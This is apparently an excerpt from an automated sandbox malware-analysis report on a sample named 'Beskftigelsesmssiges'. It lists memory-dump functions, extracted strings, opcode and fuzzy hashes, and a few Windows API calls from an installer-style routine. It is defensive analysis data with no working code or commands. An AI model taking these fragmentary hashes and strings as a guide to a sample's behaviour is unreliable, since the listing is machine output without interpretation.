LjAp, xrefs: 0015D187
PH^q, xrefs: 0015D210
LjAp, xrefs: 0015D19D

Memory Dump Source

Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 1da059be569a1ab0fb8d89bd106cc4eff17ade6b969579fb125f2f93a90b8dd4
Instruction ID: bb63b8286a6ee655f3295ae2703b547c6d740c5a700e51ac075504a27ab8600c
Opcode Fuzzy Hash: 1da059be569a1ab0fb8d89bd106cc4eff17ade6b969579fb125f2f93a90b8dd4
Instruction Fuzzy Hash: 2A81C974E00618CFDB14DFAAD984A9DBBF2BF89301F14C069E819AB365DB349985CF50

Function 00159DE0 Relevance: 6.1, Strings: 4, Instructions: 1137COMMON

Download Yara Rule

Strings

4'^q, xrefs: 0015AB13
(o^q, xrefs: 0015A518
4'^q, xrefs: 00159F0C
4'^q, xrefs: 00159E04

Memory Dump Source

Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd

Similarity

API ID:
String ID: (o^q$4'^q$4'^q$4'^q
API String ID: 0-183542557
Opcode ID: 3ffb9c0d81487b2e8f9faf5fc2eb532506a8dda79b63d623467c8f400d834daf
Instruction ID: 63d563f49e07a15abd9c7f02ca2c7cb90970ee2e2f2860dee67afcde90b6b17e
Opcode Fuzzy Hash: 3ffb9c0d81487b2e8f9faf5fc2eb532506a8dda79b63d623467c8f400d834daf
Instruction Fuzzy Hash: BCA27130A40209CFCB15CF68C994AAEBBF2BF88301F558659E815DF261D735ED89CB52

Function 00156FC8 Relevance: 5.5, Strings: 4, Instructions: 451
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(o^q, xrefs: 00157220
(o^q, xrefs: 00157212
,bq, xrefs: 00157298
,bq, xrefs: 0015728A

Memory Dump Source

Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$,bq$,bq
API String ID: 0-879173519
Opcode ID: 90a658acc7c59b905ba06badb3587f8b066b6932cb2a27ceb38b1623c6339e2d
Instruction ID: 77894e49f89b8498a4986fe1606507c40b8f60a64d38de4a496b08a800737754
Opcode Fuzzy Hash: 90a658acc7c59b905ba06badb3587f8b066b6932cb2a27ceb38b1623c6339e2d
Instruction Fuzzy Hash: 50026030A04219DFCB15CF68E885AADBBF2BF49301F158469EC25AB2A1D730DD49CF51

Function 001569A0 Relevance: 3.0, Strings: 2, Instructions: 515COMMON

Download Yara Rule

Strings

Hbq, xrefs: 00156DA6
(o^q, xrefs: 00156EDA

Memory Dump Source

Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd

Similarity

API ID:
String ID: (o^q$Hbq
API String ID: 0-662517225
Opcode ID: 2f255119b15fa8eddfb309c33493c5ad7298bd0a56e2fd79feb70b138f27ceee
Instruction ID: e087861cde529446527f40e044ddd5e35a6e6a862e3519c5e3f19bd719a405fe
Opcode Fuzzy Hash: 2f255119b15fa8eddfb309c33493c5ad7298bd0a56e2fd79feb70b138f27ceee
Instruction Fuzzy Hash: 3F127E70B00219CFDB14DF69C854AAEBBF6BF88301F248569E959DB3A1DB309D45CB90

Function 0015E988 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6759c6e401960e395483459c36994381baf53bb7ecc4897ce9d33cd99fd89b5f
Instruction ID: ee1eabd99232ec622da3545dfe6d36c2f22f103b15a2c4a96790317ec3c35bb7
Opcode Fuzzy Hash: 6759c6e401960e395483459c36994381baf53bb7ecc4897ce9d33cd99fd89b5f
Instruction Fuzzy Hash: 9551A474E00308DFDB18DFAAD584A9DBBF2BF89300F209429E819AB364DB359945CF54

Function 001576F1 Relevance: 10.5, Strings: 8, Instructions: 475
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

,bq, xrefs: 00157B90
(o^q, xrefs: 001577E9
(o^q, xrefs: 00157815
(o^q, xrefs: 00157BFF
(o^q, xrefs: 001578B2
(o^q, xrefs: 0015772E
,bq, xrefs: 00157BA0
(o^q, xrefs: 00157C0F

Memory Dump Source

Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
API String ID: 0-1932283790
Opcode ID: 7c0f1866740aa5813f987a84a9c3681176c68173d86c49581662cb92a4ce5a28
Instruction ID: 4b38eb88c1100b196796ee3b5fcfa0109ca1e0a1ff5a3baa60863e5ecf78434a
Opcode Fuzzy Hash: 7c0f1866740aa5813f987a84a9c3681176c68173d86c49581662cb92a4ce5a28
Instruction Fuzzy Hash: A9126A30A04205CFCB15CF68E985AAEBBF1FF48315F148599E8299B3A1D731ED49CB50

Function 00158490 Relevance: 3.2, Strings: 2, Instructions: 703
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 00158FD7
$^q, xrefs: 00158FB4

Memory Dump Source

Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: 6bd6d199879407c681674d981c5dd2e4d6ea0fd25994ff475f2b2a7b55d138a2
Instruction ID: 6453bbbd688fdba1efae57db58d300ac64bbd85d5ae488972ba13473deba9f24
Opcode Fuzzy Hash: 6bd6d199879407c681674d981c5dd2e4d6ea0fd25994ff475f2b2a7b55d138a2
Instruction Fuzzy Hash: 6B522274A00218CFEB149BA4C960B9EBB77EF44300F1081A9D50A7B3A5CF359E899F51

Function 00155F38 Relevance: 2.8, Strings: 2, Instructions: 327
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hbq, xrefs: 00156056
Hbq, xrefs: 00156023

Memory Dump Source

Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd

Similarity

API ID:
String ID: Hbq$Hbq
API String ID: 0-4258043069
Opcode ID: 043eb065b39e1f9a42f84c85d7352f554340dd94d8162df8af46fb208a4312cc
Instruction ID: 45ed926e07e18536ecf0f7c629c3859fd852e912694b138277ed2ae26f9a2038
Opcode Fuzzy Hash: 043eb065b39e1f9a42f84c85d7352f554340dd94d8162df8af46fb208a4312cc
Instruction Fuzzy Hash: 8BB19E30704255CFCB159F398894A7A7BB6AF88302F544569E81ACB3A1DB34CC8AD791

Function 00156498 Relevance: 2.7, Strings: 2, Instructions: 232
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

,bq, xrefs: 00156578
,bq, xrefs: 0015656E

Memory Dump Source

Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd

Similarity

API ID:
String ID: ,bq$,bq
API String ID: 0-2699258169
Opcode ID: 3e4461cd96fcf58641edc95e64bb06958d98c2a355e16274d363d92f51fbac66
Instruction ID: 26956df57074d2a93828fda158396c028dd159a16c04a0132e0bd9fd44b3c063
Opcode Fuzzy Hash: 3e4461cd96fcf58641edc95e64bb06958d98c2a355e16274d363d92f51fbac66
Instruction Fuzzy Hash: 7B819F34A00505CFCB18CF69C484969BBB2BF89312BA58169D825DF365DB31EC49CFE1

Function 00159D59 Relevance: 2.5, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 00159D84
4'^q, xrefs: 00159D6D

Memory Dump Source

Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 5a99af383d1331300b5914606719756013095e5e961ec1c4facf0a44a309335a
Instruction ID: cc4cf7f2e33e3201a2e3c01c9d31b0a1acb0d86b50e578e702eef230c317b673
Opcode Fuzzy Hash: 5a99af383d1331300b5914606719756013095e5e961ec1c4facf0a44a309335a
Instruction Fuzzy Hash: BCF06835340118AFDB081BA6985497FBBDBEBCC361B144429BD0ACB351DF71CC4683A1

Function 00150CA0 Relevance: 1.8, Strings: 1, Instructions: 539COMMON

Download Yara Rule

Strings

LR^q, xrefs: 00150F19

Memory Dump Source

Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: 5e86f0d610eee9e2d9b53e51219c023f76e8088c7430d5f15d7bd40328eb925c
Instruction ID: f80a9d12b283e7e7e866291efeb5c9800d0bee3d13a720e7de73610d631addce
Opcode Fuzzy Hash: 5e86f0d610eee9e2d9b53e51219c023f76e8088c7430d5f15d7bd40328eb925c
Instruction Fuzzy Hash: 4C52E674A40619CFCB58DF68DDA4A9DBBB2FF49301F1081A9E409A7365DB346E85CF80

Function 00152790 Relevance: 1.3, Strings: 1, Instructions: 88COMMON

Download Yara Rule

Strings

F, xrefs: 001527BF

Memory Dump Source

Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd

Similarity

API ID:
String ID: F
API String ID: 0-2730988801
Opcode ID: 09bae67d315ac11ed6892c80060f8b9f742a1c3bd68083042ee87b3c6af0a25d
Instruction ID: 1a2c623315c04cabf7fa550817da42501c2a8a327812b7b0e07dacb5c738765b
Opcode Fuzzy Hash: 09bae67d315ac11ed6892c80060f8b9f742a1c3bd68083042ee87b3c6af0a25d
Instruction Fuzzy Hash: 88316B74D093498FCB05DFB8D8046EDBFB5EF4A304F0441AAD844EB261EB345A88CBA1

Function 0015E018 Relevance: .6, Instructions: 647COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d29e1d98747d08c4ed73d782c0919dd6e0ba5697bef9a65f9b762e3d46260e65
Instruction ID: ea02b98002d68c6ab6d8f0a160143ea9446c228af5230543b19cfc05af806907
Opcode Fuzzy Hash: d29e1d98747d08c4ed73d782c0919dd6e0ba5697bef9a65f9b762e3d46260e65
Instruction Fuzzy Hash: D8129835065646CFA2502B70EDAC12BBBF1FB1F32B7546CA8F10FC58659B3144C9CA62

Function 001580D8 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9843de0b933b134418c39653e72e80aef2edcc7c5c82c5dae780437532fecdf3
Instruction ID: b4d83d810602c1a9f5be730e030f4924e4502b10a8247b2dbd1b2b1afca76ebb
Opcode Fuzzy Hash: 9843de0b933b134418c39653e72e80aef2edcc7c5c82c5dae780437532fecdf3
Instruction Fuzzy Hash: 2171F534700A05CFCB15DF68C884A6A7BE6AF99742F1540A9E826EF371DB70DC86CB51

Function 0015F71F Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4607329d8c0231808a0db31a69eaacce8b70bd6c2c7bb4f9c82bd66e8d7bf43
Instruction ID: fba75b7ba8a9408325bc8b413c1daddafd45bd37c3a6149b7fb89b6b5898b601
Opcode Fuzzy Hash: f4607329d8c0231808a0db31a69eaacce8b70bd6c2c7bb4f9c82bd66e8d7bf43
Instruction Fuzzy Hash: 1261F334D01319DFDB15CFA5C954BAEBBB2BF88304F208529D809AB3A4DB75598ACF41

Function 0015D548 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76925b9e922f5dce92d570df70b7e29eddf2a569d91f52ce7293f97e8813a576
Instruction ID: 402e23e66cbadac2853464377b2bc238822b381fe18de536ef117e2c62a121b5
Opcode Fuzzy Hash: 76925b9e922f5dce92d570df70b7e29eddf2a569d91f52ce7293f97e8813a576
Instruction Fuzzy Hash: F9519174E01208DFDB48DFA9D9849DDBBF2BF89300F209169E819AB365DB31A905CF10

Function 00159C30 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 219dc68df1e813b75e91c07f65fa5e8ddc9caf8a4f9d75641132bd2e2111e99b
Instruction ID: 239b1cb4a5d638a737596858f4438d79e718406ef8709feef5214aaa405fac35
Opcode Fuzzy Hash: 219dc68df1e813b75e91c07f65fa5e8ddc9caf8a4f9d75641132bd2e2111e99b
Instruction Fuzzy Hash: BB415C30600245CFDB01CF68C844B6A7BB6EF89312F558466ED28CF265E775DC45CBA2

Function 00155658 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ef6d1ff8514b1e34b3705ce61f5512d518ea6bf285c56c764349f8b0b371b69
Instruction ID: 00a79523f0690cd753306f8aa5cd72636cd23b28570479dcf2e2df23b8f387b9
Opcode Fuzzy Hash: 1ef6d1ff8514b1e34b3705ce61f5512d518ea6bf285c56c764349f8b0b371b69
Instruction Fuzzy Hash: 3431A131204149DFCF059F64D9A4AAE3BB3EF88301F508024FD299B255CB39DEA5DBA0

Function 001541A0 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60199cfc7f018cf4c12d1e94b1ad540af3ddad246e20a85a2a6d61898d05a087
Instruction ID: c07c7e8c1d3af724341cfa30cfc9a4ef3e65eb9c51a4fafc7c05d9c7da7b4e76
Opcode Fuzzy Hash: 60199cfc7f018cf4c12d1e94b1ad540af3ddad246e20a85a2a6d61898d05a087
Instruction Fuzzy Hash: D1419275E01208CFCB48DFAAD99099DBBF2BF89301F209029E815BB324DB34A945CF54

Function 00158380 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f65ff8a6a6ada88a81e9810c738bc7200e65bdb8b7b0539f8224a700bb8e6781
Instruction ID: c6e44534945b85271030a7bcd3581585bd34938bcd45a542cfa26c1502c1fb6b
Opcode Fuzzy Hash: f65ff8a6a6ada88a81e9810c738bc7200e65bdb8b7b0539f8224a700bb8e6781
Instruction Fuzzy Hash: 4B217131300206CBDB145629C854B7F6697AFC475AF248039DC16DF7A4EF65CC8B9391

Function 001528F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d04de86d73a2b349c84bcb65ec6de7a3da54d30d6ce61ecd8c9a861501e63000
Instruction ID: e0b3e2b29feacfe2f06f3a4a727694abc948a9680dadfe6be5309f4c73af0482
Opcode Fuzzy Hash: d04de86d73a2b349c84bcb65ec6de7a3da54d30d6ce61ecd8c9a861501e63000
Instruction Fuzzy Hash: 86218E76A001159FCB18DF24C4909AE77A5EF9A368F208059D85A9B340DB34EE06CBD2

Function 0009D554 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2939994983.000000000009D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0009D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9d000_Beskftigelsesmssiges.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e8bcc104757df970fb15f2bc66d01c4de277daa153a682d830bce02da0edeac
Instruction ID: 60d16c130a94acb0d227916c3c0a57bb57e090369012bd88bc0aadc796cab4b5
Opcode Fuzzy Hash: 8e8bcc104757df970fb15f2bc66d01c4de277daa153a682d830bce02da0edeac
Instruction Fuzzy Hash: 4F214871544200DFCF10DF14D9C0B2ABFA1FB98314F20C56AD9090B256C336D856EBA1

Function 00156300 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43998aaa9c7cd7fa2c72a67e9cf94c355de7beeb758c3a778c1b47ed25ecae26
Instruction ID: 2f40e07e508694ea61dcde90e50fce298075e4461f9f7e399f77e1af5193ed61
Opcode Fuzzy Hash: 43998aaa9c7cd7fa2c72a67e9cf94c355de7beeb758c3a778c1b47ed25ecae26
Instruction Fuzzy Hash: 7A21DE35300611CFC7199B2AC898A2EB3A2FF897567558028E81ECF7A4CF34DC468BD0

Function 00159761 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 012b196893b234e35007269abe9765ddd27ee9447c8239506bdc2ae8718a64fd
Instruction ID: f1eed2ee023d62c0c417cfebce53476e80af3b549788dc2d140c16881603e0ca
Opcode Fuzzy Hash: 012b196893b234e35007269abe9765ddd27ee9447c8239506bdc2ae8718a64fd
Instruction Fuzzy Hash: 65214B34E00249DFCB05CFA5D550AEDBFB6AF49306F248069E815AB2A0DB349985DF60

Function 0009D54F Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2939994983.000000000009D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0009D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9d000_Beskftigelsesmssiges.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e30d8c23d169001941ea9aa459473fa7ec8b4af4ddb27b59cb516a26a12e2698
Instruction ID: 28b3f5ef59fdc6155d1cf3ec30333247b97edc4fe69eaae99f9bbaa3c5a3dc0f
Opcode Fuzzy Hash: e30d8c23d169001941ea9aa459473fa7ec8b4af4ddb27b59cb516a26a12e2698
Instruction Fuzzy Hash: 24110376544280CFCF02CF14D5C4B16BFB1FB94314F24C5AAD8090B616C336D85ADBA2

Function 0015F650 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3286d55ed082e247a0385a4a8975d3896b90a1099da7250919a57a55bf16a61
Instruction ID: 31a4330141b292173f73d33267ffbd7996d7829137bf975099112fd370afdc42
Opcode Fuzzy Hash: f3286d55ed082e247a0385a4a8975d3896b90a1099da7250919a57a55bf16a61
Instruction Fuzzy Hash: 7C113AB0D001099FDB08EFA9C990A9EBBF2FF84300F10D5B9D0189B365EB745A499B80

Function 00155E98 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99a7fe2953234f4cbd345c8e46fda7ce4ffa8beb8884fe8059336424f89745a7
Instruction ID: aa864a3ae522808f2c87094be09c5eed03dc4ba5139dbb19e23f810937a4a8ad
Opcode Fuzzy Hash: 99a7fe2953234f4cbd345c8e46fda7ce4ffa8beb8884fe8059336424f89745a7
Instruction Fuzzy Hash: 69016832704204AFCB068F649C217AE3BB7DFC9350B148066FD18DB290DB318E069B90

Function 0015E8E8 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d381b8737fcec6e56d33a4cb5fa0d78bbbfa1d89b67634fc5c66cd83d92186b
Instruction ID: e8eec27eb783108ba1a69916aa5f3e431758dbf78aa57052e68bc675dcdb3f70
Opcode Fuzzy Hash: 7d381b8737fcec6e56d33a4cb5fa0d78bbbfa1d89b67634fc5c66cd83d92186b
Instruction Fuzzy Hash: 51112D74E0434AEFDB05CFA8D8545AEBBB1FF8A300F014065E914A7361D7385A56DF91

Function 0015ABE0 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee74f0420ce71467ef64ff3a9eed5d1f247da96ddb048dea38afde9955650184
Instruction ID: a318f8951600b7d4ac9b7d6a4190b319be9bda0dec96d9e37d45181188a91868
Opcode Fuzzy Hash: ee74f0420ce71467ef64ff3a9eed5d1f247da96ddb048dea38afde9955650184
Instruction Fuzzy Hash: C9F0FC313802108B87155A2EE85462A76EEEFC8B56395417AEC1DCF361DF21CC478381

Function 0015AF36 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9fd6afbcb5828346a82c089bfbc9137f51634ca9dff74ed045c9ef063690ae8
Instruction ID: 0c3463949ee1ae525ac12f5af34df97a838c65e52c2bb33d2cf00fd7680a4862
Opcode Fuzzy Hash: c9fd6afbcb5828346a82c089bfbc9137f51634ca9dff74ed045c9ef063690ae8
Instruction Fuzzy Hash: 0601D176608244DFCB159F64DC80B88BF71BF8A324F580296E9209B2E2C7308C14CB10

Function 001528B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67a648ecc08d9dc1abfd8c76a2d5ef12deaba489b358ef7c57a2645cbd0d2cb3
Instruction ID: 38500f3bade9f6392afe9a83f925e0f025d31839c3fe1b8d4446b912d8b1d3f2
Opcode Fuzzy Hash: 67a648ecc08d9dc1abfd8c76a2d5ef12deaba489b358ef7c57a2645cbd0d2cb3
Instruction Fuzzy Hash: 72D01231D2022A578B00AAA5DC044EEB738EE95665B504626D55437140EB70665986A2

Function 0015D6D4 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ba6013c36aecad39baa9faf301f12cdf34a2104e0780caba59ef254caa8b033
Instruction ID: ef515a75c57c8443f7febd5c07b51322c1fb63ef6d2a9b30ff341a570c71d440
Opcode Fuzzy Hash: 9ba6013c36aecad39baa9faf301f12cdf34a2104e0780caba59ef254caa8b033
Instruction Fuzzy Hash: C8D04235E44109CBCB20DFA8E9844DCBB71EF99322B60506AD929A3661D63054958F11

Function 00156748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8344d0f22ea95b758639842ab861e71afb564fc66cce71ff372889ffd9be7b94
Instruction ID: 65f01592ad16524979a927e5d0d7e0b22e9500cce45adc26fa45df1091e7e335
Opcode Fuzzy Hash: 8344d0f22ea95b758639842ab861e71afb564fc66cce71ff372889ffd9be7b94
Instruction Fuzzy Hash: 13C0123008430C4EC505F775DD55555B73EAB803047808520E00D0767EDFB85DC94FD0

Non-executed Functions

Function 00403532 Relevance: 72.2, APIs: 32, Strings: 9, Instructions: 464stringfilecomCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32 ref: 00403555
GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 00403580
GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 00403593
lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040362C
#17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403669
OleInitialize.OLE32(00000000), ref: 00403670
SHGetFileInfoW.SHELL32(0042AA28,00000000,?,000002B4,00000000), ref: 0040368F
GetCommandLineW.KERNEL32(00433700,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004036A4
CharNextW.USER32(00000000,0043F000,00000020,0043F000,00000000,?,00000008,0000000A,0000000C), ref: 004036DD
GetTempPathW.KERNEL32(00000400,00441800,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403815
GetWindowsDirectoryW.KERNEL32(00441800,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403826
lstrcatW.KERNEL32(00441800,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403832
